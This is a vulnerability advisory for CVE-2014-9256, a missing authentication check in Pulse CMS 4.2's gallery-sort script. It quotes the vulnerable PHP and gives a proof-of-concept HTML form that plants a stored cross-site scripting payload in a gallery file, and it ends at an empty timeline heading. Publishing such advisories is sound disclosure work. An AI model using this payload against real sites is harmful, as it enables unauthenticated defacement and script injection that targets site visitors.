Pulse CMS 4.2 Missing Authentication

Homepage:

http://pulsecms.com/

CVE-ID

CVE-2014-9256

CVSS Score

5

CVSS Vector

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description:

login.php is not included inside pulse\admin\inc\gal-sort.php so anyone can access this file.

So we control ../../content/media/". $gallery ."/gallery.txt content.

File: pulse\admin\inc\gal-sort.php

if(!empty($_POST['gallery']) && !empty($_POST['one'])) {
    $gallery = $_POST['gallery'];    
	$order   = $_POST['one'];
	$taken = array();			
	$opFile = "../../content/media/". $gallery ."/gallery.txt";

	$open = fopen($opFile,"w");
	if ($open) {
		$data  = fwrite($open, $new_data); 
		fclose($open);
	}
}

Because datas from gallery.txt are used in gallery we can put XSS there.

File: pulse\inc\tags\gal.php

$opFile = "content/media/". $galdir ."/gallery.txt";

if (file_exists($opFile)) { 
	$fp          = fopen($opFile,"r");    	
	$data        = @fread($fp, filesize($opFile));
	fclose($fp);
	$line        = explode("\n", $data);		


	foreach($line as $test){
		if(!empty($test)){
    		$test_line[] = explode("|", $test); 
		}     	        
	}
        
	foreach ($test_line as $t){
		$image = "content/media/$galdir/".$t[0];
		$info  = pathinfo($image);
		$ext   = $info['extension'];
		if ($ext != 'txt' || empty($ext)){
    		$taken[] = $image;
			echo "<a title='$t[2]' href='$image'><img src='inc/plugins/timthumb.php?src=$path/$image&h=$thumbnail_height&w=$thumbnail_width'></a>";
		}  
	}
}

Proof of Concept:

<form method="post" action="http://pulsecms-url/admin/inc/gal-sort.php">
    Gallery name: <input type="text" name="gallery">
    XSS: <input type="text" name="one[999]" value="'&gt;&lt;/a&gt;&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;">
    <input type="submit" value="Hack!">
</form>

XSS will be visible on the page where gallery is displayed.

Timeline: